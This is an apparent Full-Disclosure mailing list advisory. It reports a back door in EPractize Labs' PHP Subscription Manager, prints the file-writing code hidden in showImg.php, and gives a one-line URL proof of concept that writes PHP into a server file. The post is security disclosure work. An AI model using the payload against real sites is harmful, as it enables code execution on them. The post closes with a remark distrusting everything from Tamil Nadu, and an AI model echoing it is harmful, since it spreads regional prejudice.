Vulnerability: back door in stupid spamming software About EPractize Labs:
EPractize Labs is fully Customer Focused, Innovative and Global service provider for Skill Development and Skill Evaluation products suitable for pre employment assessment testing, employee evaluation for appraisal, employment screening, employee training, etc. About this software: http://www.epractizelabs.com/email-marketing/subscription-manager.html http://www.epractizelabs.com/email-marketing/Subscribe.zip EPractize Labs Online Subscription Manager Free PHP Online Subscription Manager Easy-to-use Subscription management that eases up your subscription management. With Subscription Manager you can create subscription forms, maintain subscription messages, send confirmation message automatically, configure the subscription forms, load subscribers list, View reports, integrate with Email Marketing Software to manage contact list and campaign management. . showImg.php passes through img.jpg, but also runs the following code as a trivial arbitrary file write back door. It has nothing to do with showing an image. <?php $reqOut="".$_GET['email']; $reqDB="".$_GET['db']; $in_fileStr = file_get_contents_me($reqDB); $count =substr_count($in_fileStr,$reqOut); if($count==0){ $finalStr="".$in_fileStr."\n".$reqOut."#".$today = date("F j, Y, g:i a"); $fT = @fopen($reqDB, 'wt'); fwrite($fT, $finalStr); fclose($fT); } ?> POC: showImg.php?db=me.php&email=<?echo "hello"; ?> Mitigation: Nobody seems to be using this junk. Vendor status: cc with this mail. What were you thinking? Administrative Contact: EPractize Labs Software Private Limited Ganesan (gane...@epractizelabs.com) 108, II Floor, Sundarar Street, Thiruvalleswarar Nagar Anna Nagar West Chennai Tamil Nadu,600040 IN Tel. +91.4465914739 Moral of the story: don't trust obfuscated software from Tamil Nadu province. Actually, just don't trust obfuscated software, and don't trust anything from Tamil Nadu. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/